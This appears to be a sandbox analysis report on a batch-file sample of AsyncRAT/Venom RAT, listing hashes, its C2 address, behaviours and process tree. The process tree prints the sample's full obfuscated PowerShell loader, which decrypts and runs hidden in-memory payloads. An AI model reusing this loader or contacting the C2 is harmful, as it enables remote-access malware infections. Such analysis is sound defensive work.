asyncrat | 74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e

General

Target

15.bat
Size

60KB
MD5

1bf971e48ba0ca904319be9147a96c33
SHA1

75078fd8b6a000b848eb3f372e5f84fb58d5b98e
SHA256

74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
SHA512

e24d8d46a962c1d659a742a1926c6628f9e88268449b36a93bba5def5390eca141903e329afd3eda70f79cc391f8391e9f15639918addc923819a3efe3dcc6d0
SSDEEP

1536:pdgEdB7d8SZXy3SMlwVdgC1mKRkm6DUL9:paEdNGSsSR3sKRkrDo

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

193.222.96.128:4449

Mutex

nkvohxapain

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2520-32-0x00000226EBFD0000-0x00000226EBFE8000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

23 2520 powershell.exe
24 2520 powershell.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

2520 powershell.exe
2520 powershell.exe
2784 powershell.exe
2784 powershell.exe
2520 powershell.exe
2520 powershell.exe
2520 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2520 powershell.exe
Token: SeDebugPrivilege 2784 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2520 powershell.exe

flow	pid	process
23	2520	powershell.exe
24	2520	powershell.exe

pid	process
2520	powershell.exe
2520	powershell.exe
2784	powershell.exe
2784	powershell.exe
2520	powershell.exe
2520	powershell.exe
2520	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe

pid	process
2520	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4696 wrote to memory of 3092	4696	cmd.exe	cmd.exe
PID 4696 wrote to memory of 3092	4696	cmd.exe	cmd.exe
PID 3092 wrote to memory of 4812	3092	cmd.exe	cmd.exe
PID 3092 wrote to memory of 4812	3092	cmd.exe	cmd.exe
PID 3092 wrote to memory of 2520	3092	cmd.exe	powershell.exe
PID 3092 wrote to memory of 2520	3092	cmd.exe	powershell.exe
PID 2520 wrote to memory of 2784	2520	powershell.exe	powershell.exe
PID 2520 wrote to memory of 2784	2520	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\15.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\15.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
3⤵
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnloses4.azq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2520-31-0x00000226EBFC0000-0x00000226EBFD0000-memory.dmp

Filesize
64KB

Download
memory/2520-39-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-30-0x00000226EBE20000-0x00000226EBE28000-memory.dmp

Filesize
32KB

Download
memory/2520-12-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-13-0x00000226EC230000-0x00000226EC274000-memory.dmp

Filesize
272KB

Download
memory/2520-14-0x00000226EC280000-0x00000226EC2F6000-memory.dmp

Filesize
472KB

Download
memory/2520-0-0x00000226EBE30000-0x00000226EBE52000-memory.dmp

Filesize
136KB

Download
memory/2520-46-0x00007FFB8AC30000-0x00007FFB8AE25000-memory.dmp

Filesize
2.0MB

Download
memory/2520-45-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-32-0x00000226EBFD0000-0x00000226EBFE8000-memory.dmp

Filesize
96KB

Download
memory/2520-11-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-47-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-44-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-34-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2520-35-0x00007FFB8AC30000-0x00007FFB8AE25000-memory.dmp

Filesize
2.0MB

Download
memory/2520-38-0x00007FFB7A740000-0x00007FFB7A759000-memory.dmp

Filesize
100KB

Download
memory/2520-10-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp

Filesize
10.8MB

Download
memory/2520-41-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp

Filesize
10.8MB

Download
memory/2520-43-0x00000226E8F50000-0x00000226E8F60000-memory.dmp

Filesize
64KB

Download
memory/2784-29-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp

Filesize
10.8MB

Download
memory/2784-26-0x000002E8BE8C0000-0x000002E8BE8D0000-memory.dmp

Filesize
64KB

Download
memory/2784-24-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp

Filesize
10.8MB

Download
memory/2784-25-0x000002E8BE8C0000-0x000002E8BE8D0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing